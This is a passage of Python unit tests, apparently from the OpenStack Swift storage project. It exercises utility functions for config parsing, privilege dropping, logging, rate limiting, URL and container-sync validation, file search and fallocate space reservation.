conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEqual(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
        with os.fdopen(fd, 'w') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEqual(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
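        # files in a conf.d directory are read in sorted order; [DEFAULT]
        # values from every file are merged into each section, with later
        # files overriding earlier ones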
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEqual(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEqual(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
import pwd
self.assertEqual(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
groups.append(pwd.getpwnam(user).pw_gid)
self.assertEqual(set(groups), set(os.getgroups()))
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
def test_drop_privileges_no_call_setsid(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'chdir',
'umask')
bad_func_calls = ('setsid',)
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=bad_func_calls)
# exercise the code
utils.drop_privileges(user, call_setsid=False)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
for func in bad_func_calls:
self.assertTrue(func not in utils.os.called_funcs)
@reset_logger_state
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds)
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, [])
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assertTrue(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
finally:
utils.sys = _orig_sys
utils.os = _orig_os
@reset_logger_state
def test_get_logger_console(self):
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertTrue(console_handlers)
# make sure you can't have two console handlers
self.assertEqual(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEqual(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEqual(new_handler, old_handler)
def verify_under_pseudo_time(
self, func, target_runtime_ms=1, *args, **kwargs):
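        # run func under a fake clock in which each time() call advances 1ms
        # and sleep() advances by the requested duration, then check that the
        # simulated runtime is within 100ms of target_runtime_ms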
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('time.sleep', my_sleep), \
patch('eventlet.sleep', my_sleep):
start = time.time()
func(*args, **kwargs)
            # make sure it's accurate to a tenth of a second; the time
            # difference is converted to milliseconds (100 ms == 1/10 s)
diff_from_target_ms = abs(
target_runtime_ms - ((time.time() - start) * 1000))
self.assertTrue(diff_from_target_ms < 100,
"Expected %d < 100" % diff_from_target_ms)
def test_ratelimit_sleep(self):
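        # a rate of zero or less disables rate limiting; 50 calls at
        # 200 per second should take roughly 250ms under the pseudo clock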
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, -5)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=250)
def test_ratelimit_sleep_with_incr(self):
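        # incr_by weights each call: 248 units at 500 per second should take
        # roughly 500ms under the pseudo clock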
def testfunc():
running_time = 0
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 248
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertEqual(248, total)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=500)
def test_ratelimit_sleep_with_sleep(self):
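        # time spent sleeping between calls is credited against the rate
        # limit (bounded by rate_buffer)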
def testfunc():
running_time = 0
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=900)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEqual(parsed.scheme, 'http')
self.assertEqual(parsed.hostname, '127.0.0.1')
self.assertEqual(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEqual(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEqual(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEqual(parsed.hostname, '::1')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEqual(parsed.hostname, '')
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEqual(len(asdf), 1)
self.assertEqual(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEqual(len(app_bins), 2)
self.assertEqual(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEqual(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEqual(len(sub_ini), 1)
self.assertEqual(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
            'Folder3/4.txt',
            'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEqual(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assertTrue(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEqual(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assertTrue(conf_dir in conf_dirs)
def test_search_tree_conf_dir_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.conf.d/base.conf',
'proxy-server/proxy-server.conf.d/pipeline.conf',
'proxy-server/proxy-noauth.conf.d/base.conf',
'proxy-server/proxy-noauth.conf.d/pipeline.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf',
dir_ext='noauth.conf.d')
self.assertEqual(len(conf_dirs), 1)
conf_dir = conf_dirs[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d')
self.assertEqual(conf_dir, expected)
def test_search_tree_conf_dir_pid_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.pid.d',
'proxy-server/proxy-noauth.pid.d',
)
with temptree(files) as t:
pid_files = utils.search_tree(t, 'proxy-server',
exts=['noauth.pid', 'noauth.pid.d'])
self.assertEqual(len(pid_files), 1)
pid_file = pid_files[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d')
self.assertEqual(pid_file, expected)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test2')
            # but can't create a file beneath a path component that is
            # already a regular file
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEqual(os.path.exists(file_name), False)
self.assertEqual(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assertTrue(os.path.exists(file_name))
self.assertEqual(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEqual(utils.human_readable(0), '0')
self.assertEqual(utils.human_readable(1), '1')
self.assertEqual(utils.human_readable(10), '10')
self.assertEqual(utils.human_readable(100), '100')
self.assertEqual(utils.human_readable(999), '999')
self.assertEqual(utils.human_readable(1024), '1Ki')
self.assertEqual(utils.human_readable(1535), '1Ki')
self.assertEqual(utils.human_readable(1536), '2Ki')
self.assertEqual(utils.human_readable(1047552), '1023Ki')
self.assertEqual(utils.human_readable(1048063), '1023Ki')
self.assertEqual(utils.human_readable(1048064), '1Mi')
self.assertEqual(utils.human_readable(1048576), '1Mi')
self.assertEqual(utils.human_readable(1073741824), '1Gi')
self.assertEqual(utils.human_readable(1099511627776), '1Ti')
self.assertEqual(utils.human_readable(1125899906842624), '1Pi')
self.assertEqual(utils.human_readable(1152921504606846976), '1Ei')
self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEqual(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEqual(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
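        # validate_sync_to returns (error, validated_url, realm, realm_key);
        # '//realm/cluster/a/c' style values only validate when a realms
        # conf is supplied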
fname = 'container-sync-realms.conf'
fcontents = '''
[US]
key = 9ff3b71c849749dbaec4ccdd3cbab62b
cluster_dfw1 = http://dfw1.host/v1/
'''
with temptree([fname], [fcontents]) as tempdir:
logger = FakeLogger()
fpath = os.path.join(tempdir, fname)
csr = ContainerSyncRealms(fpath, logger)
for realms_conf in (None, csr):
for goodurl, result in (
('http://1.1.1.1/v1/a/c',
(None, 'http://1.1.1.1/v1/a/c', None, None)),
('http://1.1.1.1:8080/a/c',
(None, 'http://1.1.1.1:8080/a/c', None, None)),
('http://2.2.2.2/a/c',
(None, 'http://2.2.2.2/a/c', None, None)),
('https://1.1.1.1/v1/a/c',
(None, 'https://1.1.1.1/v1/a/c', None, None)),
('//US/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/dfw1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//',
(None, None, None, None)),
('',
(None, None, None, None))):
if goodurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
for badurl, result in (
('http://1.1.1.1',
('Path required in X-Container-Sync-To', None, None,
None)),
('httpq://1.1.1.1/v1/a/c',
('Invalid scheme \'httpq\' in X-Container-Sync-To, '
'must be "//", "http", or "https".', None, None,
None)),
('http://1.1.1.1/v1/a/c?query',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.2/v1/a/c',
("Invalid host '1.1.1.2' in X-Container-Sync-To",
None, None, None)),
('//us/invalid/a/c',
("No cluster endpoint for 'us' 'invalid'", None,
None, None)),
('//invalid/dfw1/a/c',
("No realm key for 'invalid'", None, None, None)),
('//us/invalid1/a/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a/'", None, None, None)),
('//us/invalid1/a',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a'", None, None, None)),
('//us/invalid1/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/'", None, None, None)),
('//us/invalid1',
("Invalid X-Container-Sync-To format "
"'//us/invalid1'", None, None, None)),
('//us/',
("Invalid X-Container-Sync-To format "
"'//us/'", None, None, None)),
('//us',
("Invalid X-Container-Sync-To format "
"'//us'", None, None, None))):
if badurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEqual(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEqual(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
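        # quorum_size(n) is ceil(n / 2)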
expected_sizes = {1: 1,
2: 1,
3: 2,
4: 2,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_majority_size(self):
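        # majority_size(n) is a strict majority, n // 2 + 1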
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.majority_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_rsync_module_interpolation(self):
fake_device = {'ip': '127.0.0.1', 'port': 11,
'replication_ip': '127.0.0.2', 'replication_port': 12,
'region': '1', 'zone': '2', 'device': 'sda1',
'meta': 'just_a_string'}
self.assertEqual(
utils.rsync_module_interpolation('{ip}', fake_device),
'127.0.0.1')
self.assertEqual(
utils.rsync_module_interpolation('{port}', fake_device),
'11')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}', fake_device),
'127.0.0.2')
self.assertEqual(
utils.rsync_module_interpolation('{replication_port}',
fake_device),
'12')
self.assertEqual(
utils.rsync_module_interpolation('{region}', fake_device),
'1')
self.assertEqual(
utils.rsync_module_interpolation('{zone}', fake_device),
'2')
self.assertEqual(
utils.rsync_module_interpolation('{device}', fake_device),
'sda1')
self.assertEqual(
utils.rsync_module_interpolation('{meta}', fake_device),
'just_a_string')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}::object',
fake_device),
'127.0.0.2::object')
self.assertEqual(
utils.rsync_module_interpolation('{ip}::container{port}',
fake_device),
'127.0.0.1::container11')
self.assertEqual(
utils.rsync_module_interpolation(
'{replication_ip}::object_{device}', fake_device),
'127.0.0.2::object_sda1')
self.assertEqual(
utils.rsync_module_interpolation(
'127.0.0.3::object_{replication_port}', fake_device),
'127.0.0.3::object_12')
self.assertRaises(ValueError, utils.rsync_module_interpolation,
'{replication_ip}::object_{deivce}', fake_device)
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
f_blocks = 100
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Make sure setting noop, which disables fallocate, also stops the
# fallocate_reserve check.
# Set the fallocate_reserve to 99% and request an object that is
# about 50% the size. With fallocate_reserve off this will succeed.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('99%')
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(500)), 0)
# Setting noop to False after the constructor allows us to use
# a noop fallocate syscall and still test fallocate_reserve.
fallocate.noop = False
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1023')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1023')
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1024')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1024')
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2048')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 2048'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2048')
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 2048'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1023')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(1))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1023 <= 1023'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1022')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1% reserved, have 100 bytes * 2/100 free, and file size is
# 99, so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 2
StatVFS.f_blocks = 100
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(99)), 0)
# Want 2% reserved, have 50 bytes * 2/50 free, and file size is 49,
# so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2%')
StatVFS.f_frsize = 50
StatVFS.f_bavail = 2
StatVFS.f_blocks = 50
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(49)), 0)
# Want 100% reserved, have 100 * 100/100 free, and file size is 0,
# so fails.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('100%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 100
StatVFS.f_blocks = 100
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 100.0 <= 100.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1% reserved, have 100 * 2/100 free, and file size is 101,
# so fails.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 2
StatVFS.f_blocks = 100
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(101))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 0.99 <= 1.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
            # Want 98% reserved, have 100 bytes * 99/100 free, and file size
            # is 100, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('98%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 99
StatVFS.f_blocks = 100
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(100))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 98.0 <= 98.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 2% reserved, have 1000 bytes * 21/1000 free, and file size
# is 999, so succeeds.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2%')
StatVFS.f_frsize = 1000
StatVFS.f_bavail = 21
StatVFS.f_blocks = 1000
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(999)), 0)
            # Want 2% reserved, have 1000 bytes * 21/1000 free, and file size
# is 1000, so fails.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2%')
StatVFS.f_frsize = 1000
StatVFS.f_bavail = 21
StatVFS.f_blocks = 1000
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(1000))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 2.0 <= 2.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
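    # The FallocateWrapper below stands in for _sys_fallocate and records the
    # arguments it was called with, so the test can check that fallocate()
    # clamps zero/negative sizes to 0 and passes positive sizes through
    # unchanged.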
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
